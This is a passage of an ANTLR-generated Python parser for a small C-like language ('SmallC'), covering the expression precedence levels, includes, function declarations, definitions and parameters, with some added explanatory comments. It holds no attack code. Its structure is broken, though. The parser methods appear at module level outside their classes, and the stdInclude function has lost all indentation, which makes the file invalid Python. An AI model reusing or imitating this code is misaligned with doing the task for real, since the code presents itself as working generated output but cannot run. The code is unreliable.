                        raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
                    self.state = 191
                    self.match(SmallCParser.T__10)
                    self.state = 192
                    self.oplevel3(0)
                    pass

            self.state = 197
            self._errHandler.sync(self)
            _alt = self._interp.adaptivePredict(self._input,9,self._ctx)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.unrollRecursionContexts(_parentctx)
    return localctx
class Oplevel3Context(ParserRuleContext):
    """Parse-tree node for the ``oplevel3`` rule (ANTLR-generated)."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def oplevel2(self):
        return self.getTypedRuleContext(SmallCParser.Oplevel2Context,0)

    def oplevel3(self):
        return self.getTypedRuleContext(SmallCParser.Oplevel3Context,0)

    def getRuleIndex(self):
        return SmallCParser.RULE_oplevel3

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterOplevel3" ):
            listener.enterOplevel3(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitOplevel3" ):
            listener.exitOplevel3(self)
def oplevel3(self, _p:int=0):
    """Parse left-recursive rule ``oplevel3``: an ``oplevel2`` operand followed
    by zero or more binary tails with operator T__11 (prec 4), T__12 (prec 3)
    or T__13 (prec 2). Operator token text is in the grammar.
    """
    _parentctx = self._ctx
    _parentState = self.state
    localctx = SmallCParser.Oplevel3Context(self, self._ctx, _parentState)
    _prevctx = localctx
    _startState = 24
    self.enterRecursionRule(localctx, 24, self.RULE_oplevel3, _p)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 199
        self.oplevel2()
        self._ctx.stop = self._input.LT(-1)
        self.state = 212
        self._errHandler.sync(self)
        _alt = self._interp.adaptivePredict(self._input,11,self._ctx)
        # Outer loop (decision 11): keep consuming operator tails.
        while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
            if _alt==1:
                if self._parseListeners is not None:
                    self.triggerExitRuleEvent()
                _prevctx = localctx
                self.state = 210
                self._errHandler.sync(self);
                # Inner decision 10: which of the three operators begins this tail.
                la_ = self._interp.adaptivePredict(self._input,10,self._ctx)
                if la_ == 1:
                    localctx = SmallCParser.Oplevel3Context(self, _parentctx, _parentState)
                    self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel3)
                    self.state = 201
                    if not self.precpred(self._ctx, 4):
                        from antlr4.error.Errors import FailedPredicateException
                        raise FailedPredicateException(self, "self.precpred(self._ctx, 4)")
                    self.state = 202
                    self.match(SmallCParser.T__11)
                    self.state = 203
                    self.oplevel2()
                    pass
                elif la_ == 2:
                    localctx = SmallCParser.Oplevel3Context(self, _parentctx, _parentState)
                    self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel3)
                    self.state = 204
                    if not self.precpred(self._ctx, 3):
                        from antlr4.error.Errors import FailedPredicateException
                        raise FailedPredicateException(self, "self.precpred(self._ctx, 3)")
                    self.state = 205
                    self.match(SmallCParser.T__12)
                    self.state = 206
                    self.oplevel2()
                    pass
                elif la_ == 3:
                    localctx = SmallCParser.Oplevel3Context(self, _parentctx, _parentState)
                    self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel3)
                    self.state = 207
                    if not self.precpred(self._ctx, 2):
                        from antlr4.error.Errors import FailedPredicateException
                        raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
                    self.state = 208
                    self.match(SmallCParser.T__13)
                    self.state = 209
                    self.oplevel2()
                    pass

            self.state = 214
            self._errHandler.sync(self)
            _alt = self._interp.adaptivePredict(self._input,11,self._ctx)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.unrollRecursionContexts(_parentctx)
    return localctx
class Oplevel2Context(ParserRuleContext):
    """Parse-tree node for the ``oplevel2`` rule (unary/cast/call level)."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def oplevel2(self):
        # Nested operand of a prefix-operator or cast alternative.
        return self.getTypedRuleContext(SmallCParser.Oplevel2Context,0)

    def oplevel1(self):
        return self.getTypedRuleContext(SmallCParser.Oplevel1Context,0)

    def functionCall(self):
        return self.getTypedRuleContext(SmallCParser.FunctionCallContext,0)

    def LBRA(self):
        # Opening bracket token of the cast alternative.
        return self.getToken(SmallCParser.LBRA, 0)

    def typeDeclaration(self):
        return self.getTypedRuleContext(SmallCParser.TypeDeclarationContext,0)

    def RBRA(self):
        return self.getToken(SmallCParser.RBRA, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_oplevel2

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterOplevel2" ):
            listener.enterOplevel2(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitOplevel2" ):
            listener.exitOplevel2(self)
def oplevel2(self):
    """Parse rule ``oplevel2`` (unary level). Ten alternatives selected by
    adaptive prediction (decision 12):

      1-4, 6-7: a prefix token (T__14, T__15, T__9, T__10, T__11, T__17)
                followed by a nested ``oplevel2``;
      5:        prefix token T__16 followed by an ``oplevel1``;
      8:        a ``functionCall``;
      9:        a cast-shaped form ``LBRA typeDeclaration RBRA oplevel2``;
      10:       a bare ``oplevel1``.

    Exact prefix-operator spellings live in the .g4 grammar, not here.
    """
    localctx = SmallCParser.Oplevel2Context(self, self._ctx, self.state)
    self.enterRule(localctx, 26, self.RULE_oplevel2)
    try:
        self.state = 236
        self._errHandler.sync(self);
        la_ = self._interp.adaptivePredict(self._input,12,self._ctx)
        if la_ == 1:
            self.enterOuterAlt(localctx, 1)
            self.state = 215
            self.match(SmallCParser.T__14)
            self.state = 216
            self.oplevel2()
            pass
        elif la_ == 2:
            self.enterOuterAlt(localctx, 2)
            self.state = 217
            self.match(SmallCParser.T__15)
            self.state = 218
            self.oplevel2()
            pass
        elif la_ == 3:
            self.enterOuterAlt(localctx, 3)
            self.state = 219
            self.match(SmallCParser.T__9)
            self.state = 220
            self.oplevel2()
            pass
        elif la_ == 4:
            self.enterOuterAlt(localctx, 4)
            self.state = 221
            self.match(SmallCParser.T__10)
            self.state = 222
            self.oplevel2()
            pass
        elif la_ == 5:
            self.enterOuterAlt(localctx, 5)
            self.state = 223
            self.match(SmallCParser.T__16)
            self.state = 224
            self.oplevel1(0)
            pass
        elif la_ == 6:
            self.enterOuterAlt(localctx, 6)
            self.state = 225
            self.match(SmallCParser.T__11)
            self.state = 226
            self.oplevel2()
            pass
        elif la_ == 7:
            self.enterOuterAlt(localctx, 7)
            self.state = 227
            self.match(SmallCParser.T__17)
            self.state = 228
            self.oplevel2()
            pass
        elif la_ == 8:
            self.enterOuterAlt(localctx, 8)
            self.state = 229
            self.functionCall()
            pass
        elif la_ == 9:
            # Cast-shaped alternative: bracketed type followed by an operand.
            self.enterOuterAlt(localctx, 9)
            self.state = 230
            self.match(SmallCParser.LBRA)
            self.state = 231
            self.typeDeclaration()
            self.state = 232
            self.match(SmallCParser.RBRA)
            self.state = 233
            self.oplevel2()
            pass
        elif la_ == 10:
            self.enterOuterAlt(localctx, 10)
            self.state = 235
            self.oplevel1(0)
            pass
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class Oplevel1Context(ParserRuleContext):
    """Parse-tree node for the ``oplevel1`` rule (primary expressions)."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def variable(self):
        return self.getTypedRuleContext(SmallCParser.VariableContext,0)

    def floatLiteral(self):
        return self.getTypedRuleContext(SmallCParser.FloatLiteralContext,0)

    def integerLiteral(self):
        return self.getTypedRuleContext(SmallCParser.IntegerLiteralContext,0)

    def characterLiteral(self):
        return self.getTypedRuleContext(SmallCParser.CharacterLiteralContext,0)

    def stringLiteral(self):
        return self.getTypedRuleContext(SmallCParser.StringLiteralContext,0)

    def expression(self):
        # Parenthesized (LBRA...RBRA) or subscript (LSBRA...RSBRA) sub-expression.
        return self.getTypedRuleContext(SmallCParser.ExpressionContext,0)

    def oplevel1(self):
        return self.getTypedRuleContext(SmallCParser.Oplevel1Context,0)

    def getRuleIndex(self):
        return SmallCParser.RULE_oplevel1

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterOplevel1" ):
            listener.enterOplevel1(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitOplevel1" ):
            listener.exitOplevel1(self)
def oplevel1(self, _p:int=0):
    """Parse left-recursive rule ``oplevel1`` (primary + postfix).

    First a primary chosen by one token of lookahead: variable (IDENTIFIER),
    float/integer/character/string literal, or a bracketed ``expression``
    (LBRA...RBRA). Then zero or more postfix tails: T__14 (prec 9),
    T__15 (prec 8), or a subscript ``LSBRA expression RSBRA`` (prec 7).
    Raises ``NoViableAltException`` if no primary token matches.
    """
    _parentctx = self._ctx
    _parentState = self.state
    localctx = SmallCParser.Oplevel1Context(self, self._ctx, _parentState)
    _prevctx = localctx
    _startState = 28
    self.enterRecursionRule(localctx, 28, self.RULE_oplevel1, _p)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 248
        # One-token lookahead selects the primary alternative.
        token = self._input.LA(1)
        if token in [SmallCParser.IDENTIFIER]:
            self.state = 239
            self.variable()
        elif token in [SmallCParser.FLOAT]:
            self.state = 240
            self.floatLiteral()
        elif token in [SmallCParser.INTEGER]:
            self.state = 241
            self.integerLiteral()
        elif token in [SmallCParser.CHARACTER]:
            self.state = 242
            self.characterLiteral()
        elif token in [SmallCParser.STRING]:
            self.state = 243
            self.stringLiteral()
        elif token in [SmallCParser.LBRA]:
            self.state = 244
            self.match(SmallCParser.LBRA)
            self.state = 245
            self.expression()
            self.state = 246
            self.match(SmallCParser.RBRA)
        else:
            raise NoViableAltException(self)

        self._ctx.stop = self._input.LT(-1)
        self.state = 261
        self._errHandler.sync(self)
        _alt = self._interp.adaptivePredict(self._input,15,self._ctx)
        # Outer loop (decision 15): keep consuming postfix tails.
        while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
            if _alt==1:
                if self._parseListeners is not None:
                    self.triggerExitRuleEvent()
                _prevctx = localctx
                self.state = 259
                self._errHandler.sync(self);
                # Inner decision 14: which postfix form follows.
                la_ = self._interp.adaptivePredict(self._input,14,self._ctx)
                if la_ == 1:
                    localctx = SmallCParser.Oplevel1Context(self, _parentctx, _parentState)
                    self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel1)
                    self.state = 250
                    if not self.precpred(self._ctx, 9):
                        from antlr4.error.Errors import FailedPredicateException
                        raise FailedPredicateException(self, "self.precpred(self._ctx, 9)")
                    self.state = 251
                    self.match(SmallCParser.T__14)
                    pass
                elif la_ == 2:
                    localctx = SmallCParser.Oplevel1Context(self, _parentctx, _parentState)
                    self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel1)
                    self.state = 252
                    if not self.precpred(self._ctx, 8):
                        from antlr4.error.Errors import FailedPredicateException
                        raise FailedPredicateException(self, "self.precpred(self._ctx, 8)")
                    self.state = 253
                    self.match(SmallCParser.T__15)
                    pass
                elif la_ == 3:
                    # Subscript tail: LSBRA expression RSBRA.
                    localctx = SmallCParser.Oplevel1Context(self, _parentctx, _parentState)
                    self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel1)
                    self.state = 254
                    if not self.precpred(self._ctx, 7):
                        from antlr4.error.Errors import FailedPredicateException
                        raise FailedPredicateException(self, "self.precpred(self._ctx, 7)")
                    self.state = 255
                    self.match(SmallCParser.LSBRA)
                    self.state = 256
                    self.expression()
                    self.state = 257
                    self.match(SmallCParser.RSBRA)
                    pass

            self.state = 263
            self._errHandler.sync(self)
            _alt = self._interp.adaptivePredict(self._input,15,self._ctx)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.unrollRecursionContexts(_parentctx)
    return localctx
class ProgramContext(ParserRuleContext):
    """Parse-tree node for the top-level ``program`` rule (ANTLR-generated)."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def include(self, i:int=None):
        # With no index: all include children; with an index: that child.
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.IncludeContext)
        else:
            return self.getTypedRuleContext(SmallCParser.IncludeContext,i)

    def functionDeclaration(self, i:int=None):
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.FunctionDeclarationContext)
        else:
            return self.getTypedRuleContext(SmallCParser.FunctionDeclarationContext,i)

    def functionDefinition(self, i:int=None):
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.FunctionDefinitionContext)
        else:
            return self.getTypedRuleContext(SmallCParser.FunctionDefinitionContext,i)

    def variableDeclaration(self, i:int=None):
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.VariableDeclarationContext)
        else:
            return self.getTypedRuleContext(SmallCParser.VariableDeclarationContext,i)

    def getRuleIndex(self):
        return SmallCParser.RULE_program

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterProgram" ):
            listener.enterProgram(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitProgram" ):
            listener.exitProgram(self)
def program(self):
    """Parse the top-level ``program`` rule: zero or more of
    ``include`` | ``functionDeclaration`` | ``functionDefinition`` |
    ``variableDeclaration T__18`` (T__18 presumably the statement
    terminator — confirm in the .g4 grammar), repeated while the next
    token is in the rule's FIRST set (checked via a 64-bit token bitmask).
    """
    localctx = SmallCParser.ProgramContext(self, self._ctx, self.state)
    self.enterRule(localctx, 30, self.RULE_program)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 272
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        # Bitmask membership test: loop while the lookahead token can start
        # another top-level element (T__19, type keywords, or CONST).
        while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.T__19) | (1 << SmallCParser.TYPECHAR) | (1 << SmallCParser.TYPEFLOAT) | (1 << SmallCParser.TYPEINT) | (1 << SmallCParser.TYPEVOID) | (1 << SmallCParser.CONST))) != 0):
            self.state = 270
            self._errHandler.sync(self);
            # Decision 16 picks which top-level element follows.
            la_ = self._interp.adaptivePredict(self._input,16,self._ctx)
            if la_ == 1:
                self.state = 264
                self.include()
                pass
            elif la_ == 2:
                self.state = 265
                self.functionDeclaration()
                pass
            elif la_ == 3:
                self.state = 266
                self.functionDefinition()
                pass
            elif la_ == 4:
                self.state = 267
                self.variableDeclaration()
                self.state = 268
                self.match(SmallCParser.T__18)
                pass

            self.state = 274
            self._errHandler.sync(self)
            _la = self._input.LA(1)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class IncludeContext(ParserRuleContext):
    """Parse-tree node for the ``include`` rule (ANTLR-generated)."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def LABRA(self):
        # Opening angle-bracket token of the std-include form.
        return self.getToken(SmallCParser.LABRA, 0)

    def stdInclude(self):
        return self.getTypedRuleContext(SmallCParser.StdIncludeContext,0)

    def RABRA(self):
        return self.getToken(SmallCParser.RABRA, 0)

    def customInclude(self):
        return self.getTypedRuleContext(SmallCParser.CustomIncludeContext,0)

    def getRuleIndex(self):
        return SmallCParser.RULE_include

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterInclude" ):
            listener.enterInclude(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitInclude" ):
            listener.exitInclude(self)
def include(self):
    """Parse rule ``include``.

    Two alternatives chosen by adaptive prediction (decision 18):
      1. ``T__19 LABRA stdInclude RABRA`` — angle-bracket include
         (T__19 presumably the ``#include`` keyword; confirm in the grammar).
      2. ``T__19 customInclude`` — quoted/custom include.
    """
    localctx = SmallCParser.IncludeContext(self, self._ctx, self.state)
    self.enterRule(localctx, 32, self.RULE_include)
    try:
        self.state = 282
        self._errHandler.sync(self);
        la_ = self._interp.adaptivePredict(self._input,18,self._ctx)
        if la_ == 1:
            self.enterOuterAlt(localctx, 1)
            self.state = 275
            self.match(SmallCParser.T__19)
            self.state = 276
            self.match(SmallCParser.LABRA)
            self.state = 277
            self.stdInclude()
            self.state = 278
            self.match(SmallCParser.RABRA)
            pass
        elif la_ == 2:
            self.enterOuterAlt(localctx, 2)
            self.state = 280
            self.match(SmallCParser.T__19)
            self.state = 281
            self.customInclude()
            pass
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class StdIncludeContext(ParserRuleContext):
    """Parse-tree node for the ``stdInclude`` rule (ANTLR-generated)."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def identifier(self, i:int=None):
        # Two identifier children are parsed by this rule (name and extension).
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.IdentifierContext)
        else:
            return self.getTypedRuleContext(SmallCParser.IdentifierContext,i)

    def getRuleIndex(self):
        return SmallCParser.RULE_stdInclude

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterStdInclude" ):
            listener.enterStdInclude(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitStdInclude" ):
            listener.exitStdInclude(self)
def stdInclude(self):
localctx = SmallCParser.StdIncludeContext(self, self._ctx, self.state)
self.enterRule(localctx, 34, self.RULE_stdInclude)
try:
self.enterOuterAlt(localctx, 1)
self.state = 284
self.identifier()
self.state = 285
self.match(SmallCParser.T__20)
self.state = 286
self.identifier()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class CustomIncludeContext(ParserRuleContext):
    """Parse-tree node for the ``customInclude`` grammar rule.

    Generated ANTLR-style context; listener dispatch is guarded by
    ``hasattr`` so listeners may implement only the hooks they need.
    """
    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def stringLiteral(self):
        return self.getTypedRuleContext(SmallCParser.StringLiteralContext,0)

    def getRuleIndex(self):
        return SmallCParser.RULE_customInclude

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterCustomInclude" ):
            listener.enterCustomInclude(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitCustomInclude" ):
            listener.exitCustomInclude(self)

def customInclude(self):
    # Parse `customInclude` (rule index 36): a single stringLiteral —
    # the quoted-path form of an include.  ATN state numbers are
    # generator-emitted; do not edit.
    localctx = SmallCParser.CustomIncludeContext(self, self._ctx, self.state)
    self.enterRule(localctx, 36, self.RULE_customInclude)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 288
        self.stringLiteral()
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class FunctionDeclarationContext(ParserRuleContext):
    """Parse-tree node for the ``functionDeclaration`` grammar rule.

    Generated ANTLR-style context; multi-child accessors take an optional
    index ``i`` (None returns the full list of children of that type).
    """
    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def identifier(self):
        return self.getTypedRuleContext(SmallCParser.IdentifierContext,0)

    def LBRA(self):
        return self.getToken(SmallCParser.LBRA, 0)

    def parameters(self):
        return self.getTypedRuleContext(SmallCParser.ParametersContext,0)

    def RBRA(self):
        return self.getToken(SmallCParser.RBRA, 0)

    def declarationSpecifier(self, i:int=None):
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.DeclarationSpecifierContext)
        else:
            return self.getTypedRuleContext(SmallCParser.DeclarationSpecifierContext,i)

    def pointerPart(self, i:int=None):
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.PointerPartContext)
        else:
            return self.getTypedRuleContext(SmallCParser.PointerPartContext,i)

    def getRuleIndex(self):
        return SmallCParser.RULE_functionDeclaration

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterFunctionDeclaration" ):
            listener.enterFunctionDeclaration(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitFunctionDeclaration" ):
            listener.exitFunctionDeclaration(self)

def functionDeclaration(self):
    # Parse `functionDeclaration` (rule index 38):
    #   declarationSpecifier+ pointerPart* identifier '(' parameters ')' T__18
    # T__18 is an anonymous literal, presumably ';' (a prototype, not a
    # definition); confirm against the grammar.  The 64-bit mask test
    # checks the lookahead against the type/CONST token set.  ATN state
    # numbers are generator-emitted; do not edit.
    localctx = SmallCParser.FunctionDeclarationContext(self, self._ctx, self.state)
    self.enterRule(localctx, 38, self.RULE_functionDeclaration)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 291
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        # One-or-more declaration specifiers (do-while over the token mask).
        while True:
            self.state = 290
            self.declarationSpecifier()
            self.state = 293
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            if not ((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.TYPECHAR) | (1 << SmallCParser.TYPEFLOAT) | (1 << SmallCParser.TYPEINT) | (1 << SmallCParser.TYPEVOID) | (1 << SmallCParser.CONST))) != 0)):
                break
        self.state = 298
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        # Zero-or-more pointer parts (T__11 is presumably '*'; confirm).
        while _la==SmallCParser.T__11:
            self.state = 295
            self.pointerPart()
            self.state = 300
            self._errHandler.sync(self)
            _la = self._input.LA(1)
        self.state = 301
        self.identifier()
        self.state = 302
        self.match(SmallCParser.LBRA)
        self.state = 303
        self.parameters()
        self.state = 304
        self.match(SmallCParser.RBRA)
        self.state = 305
        self.match(SmallCParser.T__18)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class FunctionDefinitionContext(ParserRuleContext):
    """Parse-tree node for the ``functionDefinition`` grammar rule.

    Same shape as FunctionDeclarationContext plus a ``statements`` body
    child.  Generated ANTLR-style context.
    """
    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def identifier(self):
        return self.getTypedRuleContext(SmallCParser.IdentifierContext,0)

    def LBRA(self):
        return self.getToken(SmallCParser.LBRA, 0)

    def parameters(self):
        return self.getTypedRuleContext(SmallCParser.ParametersContext,0)

    def RBRA(self):
        return self.getToken(SmallCParser.RBRA, 0)

    def statements(self):
        return self.getTypedRuleContext(SmallCParser.StatementsContext,0)

    def declarationSpecifier(self, i:int=None):
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.DeclarationSpecifierContext)
        else:
            return self.getTypedRuleContext(SmallCParser.DeclarationSpecifierContext,i)

    def pointerPart(self, i:int=None):
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.PointerPartContext)
        else:
            return self.getTypedRuleContext(SmallCParser.PointerPartContext,i)

    def getRuleIndex(self):
        return SmallCParser.RULE_functionDefinition

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterFunctionDefinition" ):
            listener.enterFunctionDefinition(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitFunctionDefinition" ):
            listener.exitFunctionDefinition(self)

def functionDefinition(self):
    # Parse `functionDefinition` (rule index 40):
    #   declarationSpecifier+ pointerPart* identifier '(' parameters ')' statements
    # Identical to functionDeclaration except it ends in a brace-enclosed
    # statement block rather than a terminator token.  ATN state numbers
    # are generator-emitted; do not edit.
    localctx = SmallCParser.FunctionDefinitionContext(self, self._ctx, self.state)
    self.enterRule(localctx, 40, self.RULE_functionDefinition)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 308
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        # One-or-more declaration specifiers.
        while True:
            self.state = 307
            self.declarationSpecifier()
            self.state = 310
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            if not ((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.TYPECHAR) | (1 << SmallCParser.TYPEFLOAT) | (1 << SmallCParser.TYPEINT) | (1 << SmallCParser.TYPEVOID) | (1 << SmallCParser.CONST))) != 0)):
                break
        self.state = 315
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        # Zero-or-more pointer parts.
        while _la==SmallCParser.T__11:
            self.state = 312
            self.pointerPart()
            self.state = 317
            self._errHandler.sync(self)
            _la = self._input.LA(1)
        self.state = 318
        self.identifier()
        self.state = 319
        self.match(SmallCParser.LBRA)
        self.state = 320
        self.parameters()
        self.state = 321
        self.match(SmallCParser.RBRA)
        self.state = 322
        self.statements()
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class ParametersContext(ParserRuleContext):
    """Parse-tree node for the ``parameters`` grammar rule.

    Generated ANTLR-style context over zero or more ``parameter`` children.
    """
    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def parameter(self, i:int=None):
        # All ParameterContext children when i is None, else the i-th one.
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.ParameterContext)
        else:
            return self.getTypedRuleContext(SmallCParser.ParameterContext,i)

    def getRuleIndex(self):
        return SmallCParser.RULE_parameters

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterParameters" ):
            listener.enterParameters(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitParameters" ):
            listener.exitParameters(self)

def parameters(self):
    # Parse `parameters` (rule index 42), decision 24:
    #   alt 1: empty
    #   alt 2: parameter (',' parameter)*
    #   alt 3: empty
    # Alts 1 and 3 both match nothing — presumably two distinct empty
    # alternatives in the grammar (e.g. '' vs 'void'-less forms); confirm
    # against the grammar.  ATN state numbers are generator-emitted.
    localctx = SmallCParser.ParametersContext(self, self._ctx, self.state)
    self.enterRule(localctx, 42, self.RULE_parameters)
    self._la = 0 # Token type
    try:
        self.state = 334
        self._errHandler.sync(self);
        la_ = self._interp.adaptivePredict(self._input,24,self._ctx)
        if la_ == 1:
            self.enterOuterAlt(localctx, 1)
            pass
        elif la_ == 2:
            self.enterOuterAlt(localctx, 2)
            self.state = 325
            self.parameter()
            self.state = 330
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            # Comma-separated tail of additional parameters.
            while _la==SmallCParser.COMMA:
                self.state = 326
                self.match(SmallCParser.COMMA)
                self.state = 327
                self.parameter()
                self.state = 332
                self._errHandler.sync(self)
                _la = self._input.LA(1)
            pass
        elif la_ == 3:
            self.enterOuterAlt(localctx, 3)
            pass
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class ParameterContext(ParserRuleContext):
    """Parse-tree node for the ``parameter`` grammar rule.

    Generated ANTLR-style context: specifiers, optional pointer parts,
    optional identifier, optional array part.
    """
    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def declarationSpecifier(self, i:int=None):
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.DeclarationSpecifierContext)
        else:
            return self.getTypedRuleContext(SmallCParser.DeclarationSpecifierContext,i)

    def pointerPart(self, i:int=None):
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.PointerPartContext)
        else:
            return self.getTypedRuleContext(SmallCParser.PointerPartContext,i)

    def identifier(self):
        return self.getTypedRuleContext(SmallCParser.IdentifierContext,0)

    def arrayPart(self):
        return self.getTypedRuleContext(SmallCParser.ArrayPartContext,0)

    def getRuleIndex(self):
        return SmallCParser.RULE_parameter

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterParameter" ):
            listener.enterParameter(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitParameter" ):
            listener.exitParameter(self)

def parameter(self):
    # Parse `parameter` (rule index 44):
    #   declarationSpecifier+ pointerPart* identifier? arrayPart?
    # Identifier and array part are both optional (abstract declarators
    # like `int` or `int[]` are accepted).  ATN state numbers are
    # generator-emitted; do not edit.
    localctx = SmallCParser.ParameterContext(self, self._ctx, self.state)
    self.enterRule(localctx, 44, self.RULE_parameter)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 337
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        # One-or-more declaration specifiers.
        while True:
            self.state = 336
            self.declarationSpecifier()
            self.state = 339
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            if not ((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.TYPECHAR) | (1 << SmallCParser.TYPEFLOAT) | (1 << SmallCParser.TYPEINT) | (1 << SmallCParser.TYPEVOID) | (1 << SmallCParser.CONST))) != 0)):
                break
        self.state = 344
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        # Zero-or-more pointer parts.
        while _la==SmallCParser.T__11:
            self.state = 341
            self.pointerPart()
            self.state = 346
            self._errHandler.sync(self)
            _la = self._input.LA(1)
        self.state = 348
        _la = self._input.LA(1)
        # Optional parameter name.
        if _la==SmallCParser.IDENTIFIER:
            self.state = 347
            self.identifier()
        self.state = 351
        _la = self._input.LA(1)
        # Optional `[...]` suffix.
        if _la==SmallCParser.LSBRA:
